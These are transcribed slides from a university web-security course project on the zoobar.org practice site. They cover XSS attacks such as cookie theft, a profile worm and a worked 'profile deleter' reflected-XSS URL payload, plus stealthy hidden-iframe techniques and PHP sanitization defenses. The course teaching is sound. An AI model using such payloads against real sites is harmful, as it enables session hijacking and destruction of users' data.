Transcript Spring 2006 CS 155 Project 2: Web App Security Collin Jackson Deadlines Part 1 Attacks.

Spring 2006
CS 155
Project 2: Web App Security
Collin Jackson
1
Deadlines
2
Part 1
Attacks
3
Overview
• Explore several
attack types
• Requires both
effectiveness
and stealth
Learn:
• How an attacker can evade sanitization
• Consequences of an exploit
• JavaScript
• Very basic CSS
4
Attacks
Attack A: Cookie Theft
 Use URL encoding
 Could hijack session
lin
k
zoobar.org email
Attack B: Silent Transfer
 Navigate browser
 Use iframes, forms
badguy.com
Attack C: Login Snooping
 Evade sanitization
 Handle DOM events
zoobar.org
stanford.edu
Attack D: Profile Worm
 Confuse site scripts
 Replicate
badguy.com
zoobar.org email
zoobar.org
5
JavaScript
Browser scripting language with C-like syntax
Sandboxed, garbage collected
Closures
var x = 3; var y = function() { alert(x); }; return y;
Encapsulation/objects
function X() { this.y = 3; } var z = new X(); alert(z.y);
Can interpret data as code (eval)
Browser-dependent
6
Invoking JavaScript
Tags: <script>alert( ‘Hello world!’ )</script>
Links: javascript:alert( ‘Hello world!’ )
 Wrap code in “void” if it has return value
Event handlers:
<form onsubmit=“alert( ‘Hello world!’ )”>
<iframe onload=“alert( ‘Hello world!’ )”>
CSS (IE only)
<style>body { background:
url(javascript:alert( ‘Hello world!’ ));
}</style>
7
DOM Manipulation Examples
document.getElementByID(id)
document.getElementsByTagName(tag)
document.write(htmltext)
document.createElement(tagname)
document.body.appendChild(node)
document.forms[index].fieldname.value = …
document.formname.fieldname.value = …
frame.contentDocument.getElementById(id)
8
Arrays and Loops
Example: Change href of all links on a page
var links =
document.getElementsByTagName(‘a’);
for(var i = 0; i < links.length; i++) {
var link = links[i];
link.href = “javascript:alert(‘Sorry!’);”;
}
9
Other Useful Functions
Navigation
 document.location
 document.formname.submit()
 document.forms[0].submitfield.click()
Delayed Events
 node.addEventListener(eventname,
handler, useCapture)
 node.removeEventListener(eventname,
handler, useCapture)
 window.setTimeout(handler, milliseconds)
10
Stealthy Styles
var node = document.getElementByID(“mynodeid”);
node.style.display = ‘none’; // may not load at all
node.style.visibility = ‘hidden’; // still takes up space
node.style.position = ‘absolute’; // not included in flow
document.write( // can also write CSS rules to page
“<style>#mynodeid { visibility:hidden; }</style>”);
11
Example: Profile Deleter
???
Malicious hyperlink deletes
profile of user who clicks it
Only works when user logged in
 User might have multiple tabs open
 Might have chosen/forgotten not to log out
 Might appear in another user’s profile
Uses vulnerability in users.php from Attack A
Constructs profile deletion form and submits it
12
Find vulnerability
Site reflects
query parameter
in input field
Link can include
anything we
want here
13
Copy form data
View source
to find form
fields
Create copycat
form with our
modifications
14
URL encode
Close
previous
<input>,
<form>
Button
click triggers
form submit
15
Debugging
It didn’t work.
Open JavaScript
console
Check error
Undefined 
No properties!
Two forms
with same
name
16
Fixed version
Now with
correct
form
17
Final Test
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform
%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%
2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22
Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28
%29%3C%2Fscript%3E
users.php
replaced
with index.php
Profile deleted
18
Stealthier approaches
Post form into hidden iframe
<form name=F action=/index.php target=myframe>…
<iframe name=myframe style=“visibility:hidden”>…
Open page with form in hidden iframe
<iframe name=myframe style=“visibility:hidden”>…
<script>document.myframe.contentDocument.forms[0]
.profile_update.value =“”;</script>
19
Part 2
Defenses
20
Goals
Little programming knowledge can
be a dangerous thing
Learn:
• How easy it is to make mistakes
• That even simple code can be hard to secure
• Techniques for appropriate input validation
• PHP
• Very basic SQL
21
PHP: Hypertext Preprocessor
Server scripting language with C-like syntax
Can intermingle static HTML and code
<input value=<?php echo $myvalue; ?>>
Encapsulation/objects
class X { var $y = 3; } $z = new X(); echo $z->y;
Can embed variables in double-quote strings
$user = “world”; echo “Hello $user!”;
or $user = “world”; echo “Hello” . $user . “!”;
Form data in global arrays $_GET, $_POST, …
22
SQL
Widely used database query language
Fetch a set of records
SELECT * FROM Person WHERE Username=‘grader’
Add data to the table
INSERT INTO Person (Username, Zoobars)
VALUES (‘grader’, 10)
Modify data
UPDATE Person SET Zoobars=42 WHERE PersonID=5
Query syntax (mostly) independent of vendor
23
File structure
index.php
users.php
Only edit these files
transfer.php
login.php
includes/
 auth.php (cookie authentication)
 common.php (includes everything else)
 navigation.php (site template)
db/
 zoobar/
 Person.txt (must be writable by web server)
Includes /usr/class/cs155/projects/pp2/txt-db-api/…
24
txt-db-api
Third-party text file database library
Data can be int, string, and autoincrement
Need to escape strings: \’ \” \\
Actually magic_quotes_gpc does this for us
$recipient = $_POST[‘recipient’]; // already escaped
$sql = "SELECT PersonID FROM Person WHERE
Username='$recipient'";
$rs = $db->executeQuery($sql);
if( $rs->next() )
$id = $rs->getCurrentValueByName(‘PersonID’);
25
Defenses to Part 1
Attack A: Cookie Theft
Attack B: Silent Transfer
Attack C: Login Snooping
Attack D: Profile Worm
26
Sanitization Techniques
addslashes(string)
 Already done by magic_quotes_gpc
 Inverse: stripslashes(string)
htmlspecialchars(string [, quote_style])
 Converts
& < > ” to HTML entities
 Use ENT_QUOTES to change
’ to &#039;
strip_tags(string, [, allowable_tags])
 Max tag length 1024
 Does not sanitize tag properties
preg_replace(pattern, replacement, subject)
More info: http://php.net
27
More XSS hunting
Look for untrusted input used as output
Note sanitization already applied to each variable
 Form data has magic_quotes_gpc, db data does not
Determine browser context for output
 Inside a quoted string within a tag – worry about ’ ”
 Outside a tag – worry about < >
 Input to eval – very dangerous
Sanitize the output if necessary
 No penalty for erring on the side of caution
 But sanitizing multiple times may lead to problems
No credit for solving non-goals: SQL injection, etc.
28
Good luck!
Start early
Ask questions
Be creative
29